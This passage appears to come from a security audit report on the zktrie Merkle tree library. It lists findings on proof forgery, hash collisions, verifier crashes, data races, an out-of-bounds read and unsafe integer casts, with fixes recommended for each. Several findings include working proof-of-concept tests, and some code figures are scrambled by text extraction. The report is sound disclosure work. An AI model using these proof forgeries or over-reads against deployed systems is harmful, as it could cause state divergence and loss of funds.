HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery and, for example, a malicious entity to insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in figure 1.2. func TestMerkleTree_ForgeProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for malicious proofs", func(t *testing.T) { // Find two distinct values k1,k2 such that the first step of // the path has the sibling on the LEFT (i.e., path[0] == // false) k1, k2 := (func() (zkt.Byte32, zkt.Byte32) { k1 := zkt.Byte32{1} k2 := zkt.Byte32{2} k1_hash, _ := k1.Hash() k2_hash, _ := k2.Hash() for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] { for i := len(k1); i > 0; i -= 1 { k1[i-1] += 1 if k1[i-1] != 0 { break } } k1_hash, _ = k1.Hash() } zkt.NewHashFromBigInt(k2_hash)[:])[0] { for k1 == k2 || !getPath(1, for i := len(k2); i > 0; i -= 1 { k2[i-1] += 1 if k2[i-1] != 0 { break } } k2_hash, _ = k2.Hash() } return k1, k2 })() k1_hash_int, _ := k1.Hash() k2_hash_int, _ := k2.Hash() k1_hash := zkt.NewHashFromBigInt(k1_hash_int) k2_hash := zkt.NewHashFromBigInt(k2_hash_int) // create a dummy value for k2, and use that to craft a // malicious value for k1 k2_value := (&[2]zkt.Byte32{{2}})[:] k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash() []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())} k1_value_array := // insert k1 into the trie with the malicious value assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } // query an inclusion proof for k1 k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode) assert.Nil(t, err) assert.True(t, k1Proof.Existence) // check that inclusion proof against our root hash k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash() k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash) assert.Equal(t, k1Proof_root, zkTrie.rootHash) // forge a non-existence proof fakeNonExistProof := *k1Proof fakeNonExistProof.Existence = false // The new non-existence proof needs one extra level, where // the sibling hash is H(1,k1_hash) fakeNonExistProof.depth += 1 zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1) fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int) fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash) // Construct the NodeAux details for the malicious leaf k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value) k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int) fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash} // Check our non-existence proof against the root hash fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash) // fakeNonExistProof and k1Proof prove opposite things. k1 // is both in and not-in the tree! assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence) k1_hash) }) } Figure 1.2: A proof-of-concept test case for proof forgery Exploit Scenario Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates. Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to different final states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds. Recommendations Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2),n.ChildL.BigInt(), n.ChildR.BigInt()). Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded. +2. Lack of proof validation causes denial of service on the verifier Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-2 Target: trie/zk_trie_impl.go Description The Merkle tree proof verifier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verifier will have a runtime error. The first property that must hold is that the node associated with the Merkle proof must be a leaf node (i.e., must contain a non-nil NodeKey field). If this is not the case, computing the rootFromProof for a nil NodeKey will cause a panic when computing the getPath function. Secondly, the Proof fields must be guaranteed to be consistent with the other fields. Assuming that the proof depth is correct will cause out-of-bounds accesses to both the NodeKey and the notempties field. Finally, the Siblings array length should also be validated; for example, the VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings field is empty (highlighted in yellow in the rootFromProof function). // VerifyProof verifies the Merkle Proof for the entry and root. func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool { nodeHash, err := node.NodeHash() if err != nil { return false } rootFromProof, err := proof.Verify(nodeHash, node.NodeKey) if err != nil { return false } return bytes.Equal(rootHash[:], rootFromProof[:]) } // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { var err error sibIdx := len(proof.Siblings) - 1 path := getPath(int(proof.depth), nodeKey[:]) var siblingHash *zkt.Hash for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- { if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) { siblingHash = proof.Siblings[sibIdx] sibIdx-- } else { siblingHash = &zkt.HashZero } if path[lvl] { nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash() if err != nil { return nil, err } } else { nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash() if err != nil { return nil, err } } } return nodeHash, nil } Figure 2.1: zktrie/trie/zk_trie_impl.go#595– Exploit Scenario An attacker crafts an invalid proof that causes the proof verifier to crash, causing a denial of service in the system. Recommendations Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function. Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values. +3. Two incompatible ways to generate proofs Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-ZKTRIE-3 Target: trie/{zk_trie.go, zk_trie_impl.go} Description There are two incompatible ways to generate proofs. The first implementation (figure 3.1) writes to a given callback, effectively returning []bytes. It does not have a companion verification function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (figure 3.2) returns a pointer to a Proof struct. It has a companion verification function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust. // Prove is a simlified calling of ProveWithDeletion func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error { return t.ProveWithDeletion(key, fromLevel, writeNode, nil) } // ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes // on the path to the value at key. The value itself is also included in the last // node and can be retrieved by verifying the proof. // // If the trie does not contain a value for key, the returned proof contains all // nodes of the longest existing prefix of the key (at least the root node), ending // with the node that proves the absence of the key. // // If the trie contain value for key, the onHit is called BEFORE writeNode being called, // both the hitted leaf node and its sibling node is provided as arguments so caller // would receive enough information for launch a deletion and calculate the new root // base on the proof data // Also notice the sibling can be nil if the trie has only one leaf func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error { [...] } Figure 3.1: The first way to generate proofs (zktrie/trie/zk_trie.go#143–164) // Proof defines the required elements for a MT proof of existence or // non-existence. type Proof struct { // existence indicates wether this is a proof of existence or // non-existence. Existence bool // depth indicates how deep in the tree the proof goes. depth uint // notempties is a bitmap of non-empty Siblings found in Siblings. notempties [zkt.HashByteLen - proofFlagsLen]byte // Siblings is a list of non-empty sibling node hashes. Siblings []*zkt.Hash // NodeAux contains the auxiliary information of the lowest common ancestor // node in a non-existence proof. NodeAux *NodeAux } // BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) { [...] } Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531–551) Recommendations Short term, decide on one implementation and remove the other implementation. Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verification routine. +4. BuildZkTrieProof does not populate NodeAux.Value Severity: Low Type: Testing Difficulty: Low Finding ID: TOB-ZKTRIE-4 Target: trie/zk_trie_impl.go Description A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf("non-existence proof being checked against hIndex equal to nodeAux") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609–632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2. However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560–574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for non-inclusion proofs", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560–574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report 5. Leaf nodes with dierent values may have the same hash Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-5 Target: trie/zk_trie_node.go, types/util.go Description The hash value of a leaf node is derived from the hash of its key and its value. A leaf node’s value comprises up to 256 32-byte fields, and that value’s hash is computed by passing those fields to the HashElems function. HashElems hashes these fields in a Merkle tree–style binary tree pattern, as shown in figure 5.1. func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) { l := len(elems) baseH, err := hashScheme([]*big.Int{fst, snd}) if err != nil { return nil, err } if l == 0 { return NewHashFromBigInt(baseH), nil } else if l == 1 { return HashElems(baseH, elems[0]) } tmp := make([]*big.Int, (l+1)/2) for i := range tmp { if (i+1)*2 > l { tmp[i] = elems[i*2] } else { h, err := hashScheme(elems[i*2 : (i+1)*2]) if err != nil { return nil, err } tmp[i] = h } } return HashElems(baseH, tmp[0], tmp[1:]...) } Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#9–36) However, HashElems does not include the number of elements being hashed, so leaf nodes with different values may have the same hash, as illustrated in the proof-of-concept test case shown in figure 5.2. func TestMerkleTree_MultiValue(t *testing.T) { t.Run("Testing for value collisions", func(t *testing.T) { k := zkt.Byte32{1} k_hash_int, _ := k.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:] value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash() first2_hash, _ := zkt.PreHandlingElems(0, value1[:2]) value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash() assert.NotEqual(t, value1, value2) assert.NotEqual(t, value1_hash, value2_hash) {3}})[:] }) } Figure 5.2: A proof-of-concept test case for value collisions Exploit Scenario An adversary inserts a maliciously crafted value into the tree and then creates a proof for a different, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence. Recommendations Short term, modify PrehandlingElems to prefix the ValuePreimage array with its length before being passed to HashElems. Long term, document and review all uses of hash functions to ensure that they commit to their inputs. 6. Empty UpdatePreimage function body Severity: Informational Difficulty: N/A Type: Auditing and Logging Finding ID: TOB-ZKTRIE-6 Target: trie/zk_trie_database.go Description The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or a message that is logged. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging. 7. CanonicalValue is not canonical Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-ZKTRIE-7 Target: trie/zk_trie_node.go Description The CanonicalValue function does not uniquely generate a representation of Node structures, allowing different Nodes with the same CanonicalValue, and two nodes with the same NodeHash but different CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } … if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes. 15. init_hash_scheme is not thread-safe Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-ZKTRIE-15 Target: src/lib.rs, lib.go, c.go, types/hash.go Description zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67–69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65–71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme and second, a second Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29– However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13–15 However, the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8–24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon. 16. Safe-Rust ZkMemoryDb interface is not thread-safe Severity: High Difficulty: High Type: Undefined Behavior Finding ID: TOB-ZKTRIE-16 Target: lib.go,src/lib.rs,trie/zk_trie_database.go Description The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40–43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171–178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147–170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181–189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174–185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56–72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rust’s type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon. 17. Some Node functions return the zero hash instead of errors Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-ZKTRIE-17 Target: lib.go, trie/zk_trie_node.go Description The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149–155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160–163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. 18. get_account can read past the buer Severity: High Difficulty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs Description The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option { self.get::(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235) // all errors are reduced to "not found" fn get(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223) fn must_get_const_bytes(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect("the buf has been set to specified bytes"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100–107) #[test] fn get_account_overflow() { let storage_key = hex::decode("0000000000000000000000000000000000000000000000000000000000000000") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!("{:?}", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bits being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues. 19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-ZKTRIE-19 Target: lib.rs Description A set of unchecked integer casting operations can lead to hash collisions and runtime errors reached from the public Rust interface. The Rust library regularly needs to convert the input function’s byte array length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number. The attacker can choose to manipulate the array and cast the value to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133–138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that 